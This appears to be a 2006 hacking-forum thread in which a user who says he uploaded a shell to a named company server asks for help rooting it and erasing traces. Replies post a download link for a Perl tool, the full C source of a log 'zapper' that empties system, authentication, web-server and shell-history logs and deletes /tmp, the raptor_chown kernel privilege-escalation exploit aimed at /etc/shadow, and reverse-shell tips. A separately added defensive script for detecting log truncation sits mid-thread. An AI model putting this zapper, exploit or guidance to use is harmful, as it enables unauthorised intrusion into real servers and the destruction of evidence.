Rooting =(

Started by user0, November 19, 2006, 08:39:46 PM


user0

Hi   ;)
Well, as you probably know, I don't know much about hacking or defacing, but the other day I managed to upload a shell, so I'm really happy!  ;D ;D ;D

Anyway, the thing is I don't know what to root it with, if anyone can help me :) :) :)
Kernel:

  Linux server.gruposcreenmedia.com 2.6.9-5.0.3.EL #1 Sat Feb 19 18:26:49 CST 2005 i686 i686 i386 GNU/Linux
     Linux 2.6.9-5.0.3.EL
          linux-gnu
          uid=99(nobody) gid=99(nobody) groups=99(nobody)

Oh, and while you're at it, could you recommend a zapper, pls   :P :P


bye!!!  ;) ;) :D
  



kazin

Look, these are in Perl and it gives you 777 execute permissions..

http://rapidshare.com/files/4166620/kazin.rar.html

run perl log.pl

user0

thanks AND HAPPY BIRTHDAY!! ;D ;D ;D ;D
  



kazin

Hahaha, thanks a lot, and it's nothing ;) that's what we're here for

porq69

For those who don't know, a zapper is a script that deletes all or most of the security logs that an operating system keeps.

Example of a zapper:


/************************************************
*   agrezap.c                    *
*   ---------                    *
*                           *
*   Zapper coded by AgReSsOr of TBC LabZ    *
*   Credits: RootBox DST.            *
*                        *
*   Only for FriendS.                *
************************************************/

#include <stdio.h>

char *vd="\033[1;32m";
char *rj="\033[1;37m";
char *yl="\033[1;33m";
char *rd="\033[1;31m";

int 
main(int argc,char **argv)
{   
void
cartiotido()
{
    printf("\n         %sAgReZaP(zapper) c0d3d by AgReSsOr             \n",vd);
    printf("           ----(http://tbc-labz.org)----           \n");
    printf("\n");
}
void
greetz()
{
    printf("\n%sDedicate to :\n", rj);
    printf(" Status-x, RootBox, lwdz, KingMetal, ArCaX-ATH, Herzog,\n");
    printf(" everyone else at Forum's, #pc_labs and #tbc_labz\n\n");
}
void
engine()
{
    printf("\n[%s!] Starting Secuence of Cleaning ...\n",rd);
    printf("[%s+] General Cleaning ...\n",yl);
   
    printf("[-] stop some logs ...");
    system("unset HISTFILE");
    system("unset HISTSAVE");
    printf("                        %s[ OK %s] \n",vd,vd);

    printf("[-] killing syslog ...");
    system("killall -HUP syslogd");
    printf("                        %s[ OK %s] \n",vd,vd);
   
    printf("[-] cleaning /var/log/wtmp ...");
    system("cat /dev/null  >  /var/log/wtmp");
    printf("                %s[ OK %s] \n",vd,vd);

    printf("[-] cleaning /var/run/utmp ...");
    system("cat /dev/null  >  /var/run/utmp");
    printf("                %s[ OK %s] \n",vd,vd);

    printf("[-] cleaning /var/log/lastlog ...");
    system("cat /dev/null  >  /var/log/lastlog");
    printf("             %s[ OK %s] \n",vd,vd);

    printf("[-] cleaning /root/.bash_history ...");
    system("cat /dev/null  >  /root/.bash_history");
    printf("          %s[ OK %s] \n",vd,vd);

    printf("[-] cleaning /root/.sh_history ...");
    system("cat /dev/null  >  /root/.sh_history");
    printf("            %s[ OK %s] \n",vd,vd);

    printf("[-] cleaning /root/.history ...");
    system("cat /dev/null  >  /root/.history");
    printf("               %s[ OK %s] \n",vd,vd);

    printf("[-] cleaning /root/.cshrc ...");
    system("cat /dev/null  >  /root/.cshrc");
    printf("                 %s[ OK %s] \n",vd,vd);

    printf("[-] cleaning /root/.tcshrc ...");
    system("cat /dev/null  >  /root/.tcshrc");
    printf("                %s[ OK %s] \n",vd,vd);

    printf("[-] cleaning /var/log/secure ...");
    system("cat /dev/null  >  /var/log/secure");
    printf("              %s[ OK %s] \n",vd,vd);

    printf("[-] cleaning /var/log/messages ...");
    system("cat /dev/null  >  /var/log/messages");
    printf("            %s[ OK %s] \n",vd,vd);

    printf("[-] cleaning /var/log/xferlog ...");
    system("cat /dev/null  > /var/log/xferlog");
    printf("             %s[ OK %s] \n",vd,vd);

    printf("[%s+] Cleaning SHH log's ...\n",yl);

    printf("[-] cleaning /var/log/ssh.log ...");
    system("cat /dev/null  >  /var/log/ssh.log");
    printf("             %s[ OK %s] \n",vd,vd);
   
    printf("[-] cleaning /root/.Xauthority ...");
    system("cat /dev/null  >  /root/.Xauthority");
    printf("            %s[ OK %s] \n",vd,vd);

    printf("[%s+] Cleaning apache log's ...\n",yl);
   
    printf("[-] cleaning /var/log/apache/error.log ...");
    system("cat /dev/null  >  /var/log/apache/error.log ");
    printf("    %s[ OK %s] \n",vd,vd);

    printf("[-] cleaning /var/log/apache/access.log ...");
    system("cat /dev/null  >  /var/log/apache/access.log");
    printf("   %s[ OK %s] \n",vd,vd);

    printf("[%s+] Cleaning sendmail log's ...\n",yl);

    printf("[-] cleaning /var/log/sendmail ...");
    system("cat /dev/null  > /var/log/sendmail.log");
    printf("            %s[ OK %s] \n",vd,vd);

    printf("[-] cleaning /var/log/mail ...");
    system("cat /dev/null  >/var/log/mail.log");
    printf("                %s[ OK %s] \n",vd,vd);

    printf("[%s+] Cleaning telnet log's ...\n",yl);

    printf("[-] cleaning /var/log/telnet.log ...");
    system("cat /dev/null  > /var/log/telnet.log");
    printf("          %s[ OK %s] \n",vd,vd);
   
    printf("[-] cleaning /var/log/telned ...");
    system("cat /dev/null  > /var/log/telnetd");
    printf("              %s[ OK %s] \n",vd,vd);

    printf("[%s+] Cleaning auth log's ...\n",yl);

    printf("[-] cleaning /var/log/auth.log ...");
    system("cat /dev/null  >  /var/log/auth.log ");
    printf("            %s[ OK %s] \n",vd,vd);

    printf("[-] cleaning /var/log/auth ...");
    system("cat /dev/null  > /var/log/auth");
    printf("                %s[ OK %s] \n",vd,vd);

    printf("[%s+] Cleaning /tmp ...",yl);
    system("rm -fr /tmp");
    system("mkdir /tmp");
    printf("                         %s[ OK %s] \n",vd,vd);
}
void
usage(char *s);
    char    c;
   if (argc <= 1)
   {
    cartiotido();
   }     
   if(argc>4||argc<2)
   printf(" Uso : %s [-start)] [-greetz]\n\n", argv[0]),exit(1);
       while((c = getopt(argc, argv, "s:g:"))!= EOF)
    {
                switch (c)
        {
             case 'g':
                greetz();               
                 return 1;
             break;
             case 's':
                engine();                           
            break;
            default:                 
                        return 1;
              }
        }
printf("[%s!] Finishing ...                             %s[ OK %s] \n\n",rd,vd,vd);
printf(" Oh You never was here...;)\n\n");
}
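
An added example, not part of the thread or of the posted tool: a defender-side check for the in-place truncation (`cat /dev/null > file`) that the zapper above applies to append-only logs. The function names, the watched list and the temporary sample files are assumptions constructed for illustration.

```python
import os
import tempfile

# Append-only logs named in the zapper listing above (subset); pass to snapshot() on a real host.
WATCHED = ["/var/log/wtmp", "/var/log/lastlog", "/var/log/secure", "/var/log/messages"]

def snapshot(paths):
    """Record (inode, size) for each path, or None if it does not exist."""
    snap = {}
    for p in paths:
        try:
            st = os.stat(p)
            snap[p] = (st.st_ino, st.st_size)
        except FileNotFoundError:
            snap[p] = None
    return snap

def find_truncations(before, after):
    """Classify suspicious changes between two snapshots of append-only logs."""
    findings = {}
    for path, old in before.items():
        new = after.get(path)
        if old is None:
            continue
        if new is None:
            findings[path] = "deleted"
        elif new[0] == old[0] and new[1] < old[1]:
            findings[path] = "truncated-in-place"   # same inode, fewer bytes
        elif new[0] != old[0]:
            findings[path] = "replaced"             # rename-style rotation gives a new inode
    return findings

def demo():
    """Constructed sample: three fake logs in a temp dir, not real system logs."""
    with tempfile.TemporaryDirectory() as d:
        paths = {n: os.path.join(d, n) for n in ("wtmp", "messages", "secure")}
        for p in paths.values():
            with open(p, "w") as f:
                f.write("entry\n" * 20)
        before = snapshot(paths.values())
        open(paths["wtmp"], "w").close()            # same effect as `cat /dev/null > file`
        os.rename(paths["messages"], paths["messages"] + ".1")
        with open(paths["messages"], "w") as f:     # fresh file after rotation
            f.write("entry\n")
        with open(paths["secure"], "a") as f:       # normal growth, must not be flagged
            f.write("entry\n")
        found = find_truncations(before, snapshot(paths.values()))
        return {os.path.basename(k): v for k, v in found.items()}

if __name__ == "__main__":
    print(demo())
```

In-place truncation keeps the inode, which separates it from rename-based rotation; logrotate's copytruncate mode leaves the same signature, so hits should be correlated with the rotation schedule.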

user0

Well, I found the exploit here, but when I compile it, it gives me an error:
In function `int main(int, char**)':

  • `getgid' undeclared (first use this function)
      (Each undeclared identifier is reported only once for each function it appears in.)
    `chown' undeclared (first use this function)

Quote:
/*
* $Id: raptor_chown.c,v 1.1 2004/12/04 14:44:38 raptor Exp $
*
* raptor_chown.c - sys_chown missing DAC controls on Linux
* Copyright (c) 2004 Marco Ivaldi <[email protected]>
*
* Unknown vulnerability in Linux kernel 2.x may allow local users to
* modify the group ID of files, such as NFS exported files in kernel
* 2.4 (CAN-2004-0497).
*
* "Basically, you can change the group of a file you don't own, but not
* of an SGID executable." -- Solar Designer (0dd)
*
* On Linux 2.6.x < 2.6.7-rc3 it's possible to change the group of files you
* don't own, even on local filesystems. This may allow a local attacker to
* perform a privilege escalation, e.g. through the following attack vectors:
*
* 1)    Target /etc/shadow: on some distros (namely slackware 9.1 and debian
*   3.0, probably others) the shadow group has read access to it.
* 2)   Target /dev/mem, /dev/kmem: read arbitrary memory contents.
* 3)   Target /dev/hd*, /dev/sd*: read arbitrary data stored on disks.
* 4)   Target /dev/tty*, /dev/pts*: snoop/execute arbitrary commands.
*
* Usage:
* $ gcc raptor_chown.c -o raptor_chown -Wall
* $ ./raptor_chown /etc/shadow
* [...]
* -rw-r-----    1 root     users         500 Mar 25 12:27 /etc/shadow
*
* Vulnerable platforms:
* Linux 2.2.x (on nfs exported files, should be vuln) [untested]
* Linux 2.4.x < 2.4.27-rc3 (on nfs exported files) [tested]
* Linux 2.6.x < 2.6.7-rc3 (default configuration) [tested]
*/

#include <errno.h>
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <sys/types.h>

#define   INFO1   "raptor_chown.c - sys_chown missing DAC controls on Linux"
#define   INFO2   "Copyright (c) 2004 Marco Ivaldi <[email protected]>"

int main(int argc, char **argv)
{
   char    cmd[256];

   /* print exploit information */
   fprintf(stderr, "%s\n%s\n\n", INFO1, INFO2);

   /* read command line */
   if (argc != 2) {
      fprintf(stderr, "usage: %s file_name\n\n", argv[0]);
      exit(1);
   }
               
   /* ninpou: sys_chown no jutsu! */
   if (chown(argv[1], -1, getgid()) < 0) {
      switch(errno) {
         case EPERM:
            fprintf(stderr, "Error: Not vulnerable!\n");
            break;
         default:
            perror("Error");
      }
           exit(1);
   }
   fprintf(stderr, "Ninpou: sys_chown no jutsu!\n");

   /* print some output */
   sprintf(cmd, "/bin/ls -l %s", argv[1]);
   system(cmd);

   exit(0);
}

// milw0rm.com [2004-12-24]

  



porq69

Remember to compile it on Linux and check that it doesn't show up as compiled; they often throw errors when compiling, but what you compiled works fine.

Remember to read the instructions...

* On Linux 2.6.x < 2.6.7-rc3 it's possible to change the group of files you
* don't own, even on local filesystems. This may allow a local attacker to
* perform a privilege escalation, e.g. through the following attack vectors:
*
* 1)    Target /etc/shadow: on some distros (namely slackware 9.1 and debian
*   3.0, probably others) the shadow group has read access to it.
* 2)   Target /dev/mem, /dev/kmem: read arbitrary memory contents.
* 3)   Target /dev/hd*, /dev/sd*: read arbitrary data stored on disks.
* 4)   Target /dev/tty*, /dev/pts*: snoop/execute arbitrary commands.
*
* Usage:
* $ gcc raptor_chown.c -o raptor_chown -Wall
* $ ./raptor_chown /etc/shadow
* [...]
* -rw-r-----    1 root     users         500 Mar 25 12:27 /etc/shadow
*
* Vulnerable platforms:
* Linux 2.2.x (on nfs exported files, should be vuln) [untested]
* Linux 2.4.x < 2.4.27-rc3 (on nfs exported files) [tested]
* Linux 2.6.x < 2.6.7-rc3 (default configuration) [tested]
*/

user0

a.... ::)
hey ¹SlowEmotion², the exploit you gave me is in .sh and ActivePerl won't compile it for me =(
  



kazin

Make sure you compile it properly, as porq69 said, since it works correctly... it was tested by freak and it worked 10 out of 10, so it's trustworthy!

freak

Quote from: user0 on November 23, 2006, 04:42:31 PM
a.... ::)
hey ¹SlowEmotion², the exploit you gave me is in .sh and ActivePerl won't compile it for me =(

man, you have to run log.pl with ActivePerl .. but don't forget that when you connect.. you have to use a reverse remote connection exploit so that the shell connects to your machine
that's why he tells you to give it write permissions and type perl log.pl